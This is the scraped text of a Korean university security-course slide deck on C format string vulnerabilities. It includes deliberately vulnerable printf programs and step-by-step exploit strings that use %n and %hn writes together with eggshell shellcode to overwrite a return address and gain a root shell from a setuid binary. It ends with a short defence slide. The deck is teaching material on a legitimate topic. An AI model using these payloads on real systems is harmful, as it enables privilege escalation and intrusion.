Download presentation
Presentation is loading. Please wait.
1
- 1 - 정보 보안 개론과 실습 시스템 해킹과 보안 팀원 : 박진영 한동섭 · 권혁진
2
chapter 09. 포맷 스트링
3
- 3 - 학습목표 포맷 스트링의 취약점 이해 포맷 스트링 문자 이용 포맷 스트링 공격 수행 – 공격 과정 시나리오 (Esto 를 통한 비교 ) – 공격을 통한 Root 권한 획득 포맷 스트링 공격 방어
4
- 4 - Format String 에 대한 이해 Format String 이란 ? -C 언어에서 일반적으로 Data( 변수 ) 를 입. 출력문에서 일정한 형태로 받아들이거나 출력하기 위하여 사용하는 기호. 포맷 스트링의 종류 파라미터 (Parameter) 변수 형식 %d 정수형 10 진수 상수 (integer) %f 실수형 상수 (float) %lf 실수형 상수 (double) %c 문자 값 (char) %s 문자 스트링 ((const)(unsigned) char *) %u 양의 정수 (10 진수 ) %o 양의 정수 (8 진수 ) %x 양의 정수 (16 진수 ) %s 문자열 %n * int ( 쓰인 총 바이트 수 ) %hn %n 의 반인 2 바이트 단위
5
- 5 - Format 함수란 ? – 많은 포맷 함수들이 ANSI C 로 정의되어 있다. 더 복잡한 함수들이 기 반을 두고 있는 몇 가지 기본적인 포맷 스트링 함수들이 있다. 실제 계열 요소 : – fprintf : FILE 스트림에 프린터 – fpirntf : ‘stdout’ 스트림에 프린터 – sprintf : 어떤 스트링 안에 프린터 – snprintf : 길이 확인과 더불어 스트링 안에 프린터 – vfprintf : va_arg 구조로부터 FILE 스트림에 프린터 – vprintf : va_arg 구조로부터 ‘stdout’ 에 프린터 – vsprintf : va_arg 구조로부터 스트링에 프린터 – vsnprintf : va_arg 구조로부터 길이 확인과 함께 스트링에 프린터 Format 함수에 대한 이해
6
- 6 - ■ 포맷 스트링 함수 #include main(){ char *buffer = "wishfree"; printf("%s\n", buffer); } 올바른 포맷 스트링 함수 사용법 잘못된 포맷 스트링 함수 사용법 #include main(){ char *buffer = "wishfree\n"; printf(buffer); } 포맷 스트링 공격에 대한 이해
7
- 7 - ■ 포맷 스트링 함수의 취약점 Test1.c #include main(){ char *buffer = "wishfree\n%x\n"; printf(buffer); } 포맷 스트링 공격에 대한 이해
8
- 8 - ■ 포맷 스트링 함수의 취약점 Test3.c #include main(){ long i=0x00000064, j=1; printf(" 최초 i 의 값 : %x\n",&i); printf("i 값이 저장된 주소 : %x\n",i); printf("%64d%n\n", j, &i); printf(" 변경된 i 의 값 : %x\n",i); } 포맷 스트링 공격에 대한 이해
9
- 9 - ■ 포맷 스트링 함수의 취약점 Test6.c #include #include "dumpcode.h" main(){ char buffer[64]; fgets(buffer, 63, stdin); printf(buffer); dumpcode ((char *)buffer, 100); } 포맷 스트링 공격에 대한 이해
10
- 10 - ■ 포맷 스트링 함수의 취약점 Test6.c 포맷 스트링 공격에 대한 이해 gcc -o test6 test6.c./test6 AAAAAAAA
11
- 11 - ■ 포맷 스트링 함수의 취약점 Test6.c 포맷 스트링 공격에 대한 이해 (printf "\x41\x41\x41\x41\x98\xfd\xff\xbf%c%n"; cat) |./test6 % 기호가 2 개인 이유는 cat 을 지나면서 1 개는 사라짐.
12
- 12 - ■ 포맷 스트링 함수의 취약점 Test6.c 포맷 스트링 공격에 대한 이해 (printf "\x41\x41\x41\x41\x98\xfd\xff\xbf%c%hn"; cat) |./test6 % 기호가 2 개인 이유는 cat 을 지나면서 1 개는 사라짐.
13
- 13 - ■ 포맷 스트링 함수의 취약점 Test6.c 포맷 스트링 공격에 대한 이해 (printf "\x41\x41\x41\x41\x98\xfd\xff\xbf%c%hn"; cat) |./test6 % 기호가 2 개인 이유는 cat 을 지나면서 1 개는 사라짐.
14
- 14 - ■ 포맷 스트링 함수의 취약점 Test6.c 포맷 스트링 공격에 대한 이해 (printf "\x41\x41\x41\x41\x98\xfd\xff\xbf%64d%hn"; cat) |./test6 % 기호가 2 개인 이유는 cat 을 지나면서 1 개는 사라짐.
15
- 15 - 포맷 스트링 공격에 대한 이해 RET (0xbffffabc) 0xbfabfabc 0xbfabfabc (16) = 3221224124 (10) => RET 에 대입불가 ! 0xbfab / 0xfabc => %hn 으로 2byte 씩 나눔
16
- 16 - ■ 포맷 스트링 함수의 취약점 Test6.c 포맷 스트링 공격에 대한 이해 (printf "\x41\x41\x41\x41\x98\xfd\xff\xbf%3221224116d%n"; cat) |./test6 (printf "\x41\x41\x41\x41\x98\xfd\xff\xbf%64180d%hn"; cat) |./test6 Cpu 에서 3221224116 같이 큰수는 바로 인식할 수 없다 % 기호가 2 개인 이유는 cat 을 지나면서 1 개는 사라짐.
17
- 17 - ■ 포맷 스트링 함수의 취약점 Test6.c 포맷 스트링 공격에 대한 이해 (printf "\x41\x41\x41\x41\x98\xfd\xff\xbf \x41\x41\x41\x41\x9a\xfd\xff\xbf%64180d%hn%50423d%hn"; cat) |./test6 0xbfabfabc 0xfabc = 64188 - 16 = %64172d 0x1bfab = 114603 - (64172+16) = %50415d % 기호가 2 개인 이유는 cat 을 지나면서 1 개는 사라짐.
18
- 18 - ■ 포맷 스트링 함수의 취약점 Test6.c 포맷 스트링 공격에 대한 이해 (printf "\x41\x41\x41\x41\x98\xfd\xff\xbf \x41\x41\x41\x41\x9a\xfd\xff\xbf%64172d%hn%50415d%hn"; cat) |./test6 % 기호가 2 개인 이유는 cat 을 지나면서 1 개는 사라짐.
19
- 19 - ■ 포맷 스트링 공격 수행 bugfile.c #include main(){ int i =0; char buf[64]; memset(buf, 0, 64); read(0, buf, 64); printf(buf); } 포맷 스트링 공격에 대한 이해
20
- 20 - ■ 포맷 스트링 공격 수행 bugfile.c 포맷 스트링 공격에 대한 이해
21
- 21 - ■ 포맷 스트링 공격 수행 GDB 를 이용한 Bugfile 메모리 구조 확인 Disass main break *0x8048657 run 포맷 스트링 공격에 대한 이해
22
- 22 - ■ 포맷 스트링 공격 수행 GDB 를 이용한 Bugfile 메모리 구조 확인 info reg $ebp x/12 $ebp 포맷 스트링 공격에 대한 이해
23
- 23 - 공격 과정 시나리오 – 일반적인 Format String Attack 의 공격법은 Buffer Overflow 와 비슷한 공격 양태를 갖음 ⓐ 취약성 프로그램의 Return address 를 유추 ⓑ Shellcode 를 Stack 에 띄움 ⓒ Return address 와 Shellcode 의 주소로 Format String 을 구성 ⓓ 취약 프로그램의 Buffer 에 그 Format String 을 넣고 공격 ⓔ 실패시 다시 프로그램의 Return address 를 유추 및 위의 과정 반복 포맷 스트링 공격에 대한 이해
24
- 24 - 공격 시나리오 1.Eggshell 을 실행하여 Stack 의 일부분에 Shellcode 를 띄움 ( 여기까지 Overflow 기법과 유사 ) 2. Return address 를 알아낸 부분에 Eggshell 실행 시 나온 주소 (Shell address) 로 Overwrite 시킴 3. Setuid 가 붙어 있는 프로그램이 Root 권한의 상태로 실행을 하고 있다가 Overwrite 된 Return address 가 Shellcode 를 실행하면서 Root 권한의 Shell 이 뜨게 됨 포맷 스트링 공격에 대한 이해
25
- 25 - ■ 포맷 스트링 공격 수행 실제 공격 chmod 4755 bugfile su wishfree./egg 포맷 스트링 공격에 대한 이해
26
- 26 - ■ 포맷 스트링 공격 수행 실제 공격 포맷 스트링 공격에 대한 이해 bugfile 의 RET 주소 (0xbffff36c ~ 0xbffff36e) 에 egg shell 에서 확보한 0xbffffd58 을 입력 0xbffffd58 을 2 byte 씩 나눔 1bfff = 114687 / fd58 = 64856 0xfd58 = 64856 - 16 = %64840d 0x1bfff = 114687 - (64840+16) = %49831d Egg shell 을 이 용한 주소값
27
- 27 - ■ 포맷 스트링 공격 수행 실제 공격 포맷 스트링 공격에 대한 이해 (printf "\x41\x41\x41\x41\x6c\xf3\xff\xbf \x41\x41\x41\x41\x6e\xf3\xff\xbf%64840d%hn%49831d%hn";cat) |./bugfile % 기호가 2 개인 이유는 cat 을 지나면서 1 개는 사라짐.
28
- 28 - ■ 포맷 스트링 공격에 대한 대응책 포맷 스트링 공격에 대한 대응책은 printf 명령문과 같이 포맷스트링을 사용하는 함수를 정상적으로 사용하면, 문제가 생기지 않는다. 주요 취약 함수 printf("%s\n", buffer); fprintf (fp, 서식문자열, 인자 1,..., 인자 N) int sprintf (char *str, const char *fmt,...) snprintf (char *str, size_t count, const char *fmt,...) 유닉스 Sysem V 에서 사용하는 함수 : vfprintf, vprintf, vsprintf, vsnprintf 포맷 스트링 공격에 대한 대응책
29
- 29 - Thank you
Similar presentations